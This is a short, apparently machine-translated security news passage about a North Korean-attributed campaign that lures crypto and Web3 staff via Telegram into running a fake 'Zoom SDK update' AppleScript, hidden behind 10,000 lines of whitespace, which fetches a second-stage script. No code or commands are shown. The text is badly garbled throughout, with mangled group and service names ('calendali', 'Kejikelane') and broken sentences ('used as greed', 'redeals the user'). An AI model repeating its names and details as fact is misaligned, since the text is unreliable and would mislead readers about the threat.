Fake zoom meeting invitation is used as greed
The recent attack campaigns against Crypto and Web 3 companies started in April and were previously documented by Huntabil.it And HuntWho blamed the attacks for a North Korean subgroup, which has returned to the minimum 2017 dates and has been tracked into the security industry under different names: TA444, Bluenoroff, Sapphire Sleet, Copernicium, Stardust Cholima, or Kejikelane.
The victims received messages on Telegram, which they knew and trusted, who invited them to schedule a meeting through an appointment scheduling service, calendali. He then received a fake email with an invitation to a zoom meeting, as well as instructions to run “Zoom SDK update script”.
This script is called zoom_sdk_support.scptA language developed by Apple to control MACOS applications, written in Applescript, This first-step script is padded with 10,000 lines of white space to make it hard to read malicious code, but it aims to download a second-step script from another attacker-controlled domain with a zoom word. This is the second-step script downloads an HTML script that redeals the user from the background attack chain as an distraction on an actual zoom meeting link.
